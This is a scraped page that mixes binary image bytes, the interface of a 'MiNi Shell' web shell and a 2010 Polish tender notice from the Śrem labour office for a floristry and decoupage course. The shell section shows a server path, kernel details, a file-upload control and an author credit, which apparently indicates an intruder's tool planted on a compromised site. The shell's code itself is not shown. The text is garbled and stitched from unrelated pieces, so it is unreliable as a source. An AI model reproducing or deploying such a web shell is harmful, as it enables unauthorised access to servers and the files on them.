JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/15673-N-2010.html

<p class="kh_header"><b>Śrem: Zorganizowanie i przeprowadzenie szkolenia p.n. Kurs florystyczny z elementami  obsługi kas fiskalnych i decoupage</b><br>
<b>Numer ogłoszenia: 15673 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Śremie , ul. Adama Mickiewicza 56, 63-100 Śrem, woj. wielkopolskie, tel. 0-61 2837059, faks 0-61 2837075 w. 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.srem.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia p.n. Kurs florystyczny z elementami  obsługi kas fiskalnych i decoupage.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowdzenie Kursu florystycznego z elementami obsługi kas fiskalnych i decoupage dla grupy 20 osób bezrobotnych. Kurs skierowany jest do osób bezrobotnych z wykształceniem minimum zawodowym, posiadających zdolności manualne, zainteresowanych pracą w kwiaciarniach, sklepach z pamiątkami lub prowadzeniem własnej firmy. Celem szkolenia jest nauka układania kompozycji kwiatowych i wiązanek, jak również nauka sztuki pakowania prezentów, technik zdobienia przedmiotów, tworzenia biżuterii oraz nabycie wiedzy na temat zakładania i prowdzenia własnej działalności gospodarczej. Kurs powinien być wzbogacony o naukę obsługi kasy fiskalnej.
W zakresie tematycznym szkolenia powinny się znaleźć takie elementy jak:
1. Materiałoznawstwo, roślinoznawstwo i pielęgnacja roślin
2. Zasady kompozycji we florystyce
3. Technika pakowania prezentów
4. Obsługa kasy fiskalnej
5. Obsługa klienta w tym elementy psychologii
6. Decoupage
7. Biżuteria
8. ABC Przedsiębiorczości.

Zasady kompozycji we florystyce - praktyczne zastosowanie spiralnego układu łodyg przy tworzeniu bukietów, bukiety okolicznościowe, wykonanie wiązanki ślubnej, wiązanki komunijnej, wieńce i bukiety pogrzebowe, dekoracja pojedynczego kwiatu, metody zabezpieczania kwiatów.

Obsługa kasy fiskalnej - podstawy prawne gospodarki kasowej, ochrona wartości pieniężnych, odpowiedzialność kasjera.

Obsługa klienta - pojęcie komunikacji, rozmowa z klientem, rozpoznanie oczekiwań klienta, aktywne metody sprzedaży, prawa i obowiązki sprzedawcy, kultura pracy.

Decoupage - technika decoupage klasycznego- technika serwetkowa, zastosowanie papieru ryżowego- wykonanie świecznika na tea; technika postarzania - efekt spękanej farby; crackle jednoskładnikowy i dwuskładnikowy - zastosowanie przy wykańczaniu prac oraz zastosowanie na powierzchni drewnianej, zabezpieczanie pracy werniksem; techniki świecowania - shabby chic - zasady zdobienia przedmiotów i nadawanie im stylowego wyglądu przy pomocy farby i świecy; dekalkomania - efekt przetartej farby; przecierki dwu- 
i wielokolorowe; technika Stencel - szablony w decoupage.; technika faktury - różne efekty na malowanym tle przy pomocy różnych narzędzi; techniki cieniowania - monochromatyczne i wielokolorowe tzw. pittorico oraz krajobrazowe.

Biżuteria - wykonanie kompletu z drewna i sznurka woskowego, ze szkła i linki jubilerskiej, z żyłki i pereł (klejenie); wykonanie broszki z korali szklanych i drutu, bransoletki na łańcuszku, naszyjnika; wykonanie kolczyków na bazie koła, kolczyków z linki jubilerskiej i szklanych korali; wykonanie breloka; decoupage w biżuterii.

ABC Przedsiębiorczości- zasady podejmowania własnej działalności gospodarczej; sprawy formalne związane z uruchomieniem firmy; opodatkowanie działalności gospodarczej; ubezpieczenie społeczne osób prowadzących działalność gospodarczą; firma w Internecie - sprzedaż w sklepie internetowym; biznes plan - harmonogram, analiza SWOT i finansowa przedsięwzięcia; dotacja z PUP, możliwość uzyskania innych dotacji z funduszy UE.

Zgodnie z programem kursu szkolenie powinno obejmować 140 godzin lekcyjnych  
na jednego uczestnika. Zajęcia powinny być realizowane od poniedziałku do piątku. Liczba godzin kursu w ciągu tygodnia nie może być mniejsza niż 30 godzin zegarowych. Zajęcia winny być przeprowadzone w godzinach od 8:00 do max 15:00. Szkolenie powinno być przeprowadzone na terenie Śremu. W przypadku wskazania innego miejsca kursu, instytucja szkoleniowa zobowiązana jest zapewnić dojazd do miejsca szkolenia i powrót do Śremu. Podczas trwania kursu instytucja szkoleniowa powinna prowadzić dokumentację z przebiegu szkolenia: 
1. dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych (listę obecności bezrobotni winni podpisywać w każdym dniu zajęć),
2. protokół z zaliczeń bądź egzaminów,
3. rejestr wydanych zaświadczeń.
Na zakończenie szkolenia jego uczestnicy winni wypełnić ankietę służącą do oceny szkolenia oraz otrzymać stosowne zaświadczenie o jego ukończeniu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca musi spełniać warunki określone w art. 22 ust 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655 z późn. zm.) - sposób dokonania oceny spełnia/nie spełnia;
2. Wykonawca, który nie podlega wykluczeniu w związku z art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655 z późn. zm.) - sposób dokonania oceny spełnia/nie spełnia;
3. Wykonawca, który posiada zaktualizowany w okresie ostatnich 30 dni wpis do ewidencji działalności gospodarczej - sposób dokonania oceny spełnia/nie spełnia; 
4. Wykonawca, który posiada zaktualizowany na 2010 rok wpis do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy - sposób dokonania oceny spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o: spełnieniu warunków określonych w art. 22 ust 1 oraz o braku podstaw do wykluczenia  na podst. art. 24 ustawy z dnia 29 stycznia 2004r. - stanowiące Załącznik nr 1;
2. Zaktualizowany w okresie ostatnich 30 dni wpis do ewidencji działalności gospodarczej
3. Zaktualizowany na 2010 rok wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy wojewódzki urząd pracy.
Kopie dokumentów zawarte w punkcie 2 i 3 winny być potwierdzone za zgodność z oryginałem.
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkłada taże dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 16</li>
<li>2 - Zakres i jakość oferowanego programu szkolenia - 16</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 16</li>
<li>4 - Dostosowanie miejsca szkolenia oraz wyposażenia w sprzęt i pomoce dydaktyczne, z uwzględnieniem przepisów BHP - 16</li>
<li>5 - Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 3</li>
<li>6 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 3</li>
<li>7 - Sposób sprawdzenia efektów szkolenia - 6</li>
<li>8 - Rodzaj dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji - 6</li>
<li>9 - Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy - 3</li>
<li>10 - Posiadane referencje - 3</li>
<li>11 - Liczba przeprowadzonych szkoleń tego typu - 6</li>
<li>12 - Dotychczasowa współpraca z PUP - 6</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający nie przewiduje udostępnienia SIWZ na stronie internetowej. SIWZ zostanie przekazana zakwalifikowanym Wykonawcom wraz z zaproszeniem do  składania ofert wstępnych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 15:00, miejsce: Powiatowy Urząd Pracy w Śremie, 63-100 Śrem ul. Mickiewicza 56, pokój nr 13 (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com